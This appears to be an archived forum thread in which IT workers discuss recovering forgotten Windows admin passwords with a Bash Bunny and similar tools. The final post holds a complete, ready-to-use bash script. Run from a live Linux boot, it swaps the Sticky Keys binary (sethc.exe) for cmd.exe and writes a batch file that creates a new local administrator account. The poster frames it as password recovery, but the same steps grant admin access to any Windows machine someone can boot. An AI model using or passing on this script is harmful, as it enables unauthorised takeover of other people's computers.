Acronym Posted September 17, 2018 Share Posted September 17, 2018 Hey! I just ordered a Bash Bunny, and am eager to start playing around with it. I work in the IT world, and a common complaint with new clients is they've forgotten their Windows Admin Passwords. Generally we would just go in there with the well known windows exploit to get that going, however I'm wondering if there was a way to get the bunny to do that faster, and easier. My question is, not knowing the admin password, and not being able to login to the computer (or being able to log in as only a USER not an admin) is there a way to have the bunny pull the password (or even the hash?) Link to comment Share on other sites More sharing options...
Dice Posted September 17, 2018 Share Posted September 17, 2018 If you can type it, you can have the bunny do it. However; as the local admin password is encrypted i would not know a way to extract that. Booting an (unencrypted) disk with any repair disk would reset it; not retrieve it, However, the bunny is unable to do this. Link to comment Share on other sites More sharing options...
Bigbiz Posted September 22, 2018 Share Posted September 22, 2018 Also to extract the hash is not gonna work as the hash files are locked into the computer, even from an admin terminal. im working on a ducky script to extract the hash to crack offline but as you see problems, some research is due. . Link to comment Share on other sites More sharing options...
dennishedgehog Posted November 2, 2018 Share Posted November 2, 2018 why not use the Lan turtle and employ snagging creds module? Link to comment Share on other sites More sharing options...
NoExecute Posted November 3, 2018 Share Posted November 3, 2018 Or, just boot from a Kali Live system, mount the Windows drive. ------------sethcpatch.sh v2 start-------------- #! /bin/bash # cmd.exe --> sethc.exe copy patch # Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, utestet på Server 2016 # Version 0.2 - Juni 2018 # By kent j <kent@labet.dk> HELP() { echo "Run with patchwin / unpatchwin" } PATCH_WIN () { echo "patching windows sethc function...." sleep 2 mkdir patch cp sethc.exe patch/sethc.bak cp cmd.exe patch/cmd.bak rm sethc.exe cp cmd.exe sethc.exe echo "patching done ......" sleep 2 echo "Writing windows bat file..." cd patch touch useradd.bat echo "net user /add USER PASS" >useradd.bat echo "net localgroup administratorer USER /add" >>useradd.bat cd .. sleep 2 echo "useradd.bat written to c:\windows\system32\patch\useradd.bat" echo "Run with useradd.bat" sleep 2 } UNPATCH_WIN() { echo "unpatch Windows sethc.exe" sleep 2 rm sethc.exe rm cmd.exe cd patch cp sethc.bak ../sethc.exe cp cmd.bak ../cmd.exe cd .. rm -rf patch sleep 2 echo "Cleanup ended !" echo "sethc.exe & cmd.exe back to normal..." echo "Script terminated... " } case $1 in help) HELP ;; patchwin) PATCH_WIN ;; unpatchwin) UNPATCH_WIN ;; esac exit 0 -----------------sethcpatch.sh v2 End------------------ just add this to a custom Kali under /opt/tools/local/win (or whereever you like) Makes your life soo much easier when users are forgettng their passwords :D For use, copy it to the local windrive and run it. When in windows terminal, run the bat file. Log in, and enjoy admin privs :) /Kent Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.